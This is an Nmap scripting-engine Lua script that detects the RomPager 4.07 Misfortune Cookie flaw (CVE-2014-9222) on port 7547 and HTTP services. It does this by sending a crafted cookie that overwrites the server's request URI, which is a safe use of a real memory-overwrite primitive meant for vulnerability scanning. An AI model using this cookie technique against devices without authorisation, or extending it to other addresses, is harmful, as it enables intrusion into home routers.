-- NSE script metadata: these globals are read by the Nmap scripting engine.
description = [[Detects the RomPager 4.07 Misfortune Cookie vulnerability by safely exploiting it.]]

author = 'Andrew Orr'
license = 'Same as Nmap--See https://nmap.org/book/man-legal.html'

-- "intrusive" because the check sends a crafted cookie that the description
-- itself calls an exploit, so the script is not selected by default runs.
categories = {
  "vuln",
  "intrusive",
}

---
-- @usage
-- nmap <target> -p 7547 --script=http-vuln-misfortune-cookie
--
-- @output
-- PORT   STATE SERVICE REASON
-- 7547/tcp open  unknown syn-ack
-- | http-vuln-misfortune-cookie:
-- |   VULNERABLE:
-- |   RomPager 4.07 Misfortune Cookie
-- |     State: VULNERABLE
-- |     IDs:  BID:71744  CVE:CVE-2014-9222
-- |     Description:
-- | The cookie handling routines in RomPager 4.07 are vulnerable to remote code
-- | execution. This script has verified the vulnerability by exploiting the web
-- | server in a safe manner.
-- |     References:
-- |       http://www.kb.cert.org/vuls/id/561444
-- |       http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf
-- |       http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9222
-- |       http://www.checkpoint.com/blog/fortune-cookie-hole-internet-gateway/index.html
-- |_      http://www.securityfocus.com/bid/71744

local http = require "http"
local shortport = require "shortport"
local vulns = require "vulns"

-- Run against the port used in the @usage example, or against any port whose
-- detected service name is "http".
-- NOTE(review): 7547 is presumably the TR-069 management port the references
-- discuss -- confirm against the advisory.
local DEFAULT_PORT = 7547
portrule = shortport.port_or_service(DEFAULT_PORT, "http")

-- Cookie name sent by the probe. It encodes the memory address whose
-- overwrite replaces the request URI on an affected server.
-- Keep this value fixed: other addresses may have other effects, some harmful.
local MAGIC_COOKIE = "C107373883"

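--- Send the single probe request and classify the reply.
-- The request asks for "/" and carries the cookie MAGIC_COOKIE=<request_path>.
-- Per the note on MAGIC_COOKIE, an affected server ends up with its request
-- URI overwritten, so its "not found" page names request_path instead of "/".
-- @param host Host table handed to the action by NSE.
-- @param port Port table handed to the action by NSE.
-- @return true if the marker text is present in the reply, false if a reply
--         arrived without it, nil if no HTTP response was obtained (the
--         check could not be performed).
local function vuln_to_misfortune_cookie(host, port)
  local request_path = "/nmap_test"
  local options = { cookies = MAGIC_COOKIE .. "=" .. request_path }
  local flag = request_path .. "' was not found on the RomPager server."
  local response = http.get(host, port, "/", options)

  -- A failed request comes back with a nil status. Treat that as "could not
  -- test" rather than as a negative result, so a timeout or reset is never
  -- reported as a clean device.
  if not response or response.status == nil then
    return nil
  end

  -- NOTE(review): http.response_contains treats `flag` as a Lua pattern, so
  -- the trailing "." matches any character; harmless for this marker.
  return http.response_contains(response, flag) and true or false
end

--- Script entry point: run the probe and format the result with the vulns
-- library.
-- @param host Host table supplied by NSE.
-- @param port Port table supplied by NSE.
-- @return Whatever report:make_output produces for the vulnerability table.
action = function(host, port)
  local vuln = {
    title = "RomPager 4.07 Misfortune Cookie",
    state = vulns.STATE.NOT_VULN,
    IDS = { CVE = 'CVE-2014-9222', BID = '71744' },
    description = [[
The cookie handling routines in RomPager 4.07 are vulnerable to remote code
execution. This script has verified the vulnerability by exploiting the web
server in a safe manner.]],
    references = {
      "http://www.checkpoint.com/blog/fortune-cookie-hole-internet-gateway/index.html",
      "http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf",
      "http://www.kb.cert.org/vuls/id/561444"
    }
  }
  local report = vulns.Report:new(SCRIPT_NAME, host, port)

  local result = vuln_to_misfortune_cookie(host, port)
  if result then
    vuln.state = vulns.STATE.VULN
  elseif result == nil then
    -- No HTTP response at all: an inconclusive probe must not be recorded as
    -- NOT_VULN, which would be a false negative in fleet scan results.
    vuln.state = vulns.STATE.UNKNOWN
  end
  -- Otherwise the state stays at its NOT_VULN default.

  return report:make_output(vuln)
end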
